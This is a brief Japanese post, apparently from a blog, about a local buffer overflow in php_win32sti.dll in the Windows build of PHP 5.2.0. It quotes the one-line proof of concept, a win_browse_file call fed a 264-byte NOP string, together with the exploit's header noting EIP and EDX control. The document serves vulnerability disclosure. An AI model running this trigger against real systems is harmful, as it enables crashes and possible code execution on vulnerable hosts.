PHP
PHP5.2.0のWindows版でローカルバッファオーバフローが発生する脆弱性のPoCが出ています。たった1行・・・
win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );
// ================================================================================== // // php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow // // [x] Discovery: boecke <boecke@herzeleid.net> // [x] Risk: Local Buffer Overflow (Medium - High Risk) // [x] Notes: EDX and EIP are able to be controlled and therefore // have the potential to dictate program flow. // // [x] "Sangre, sonando, de rabia naci.. Who do you trust?" // // ==================================================================================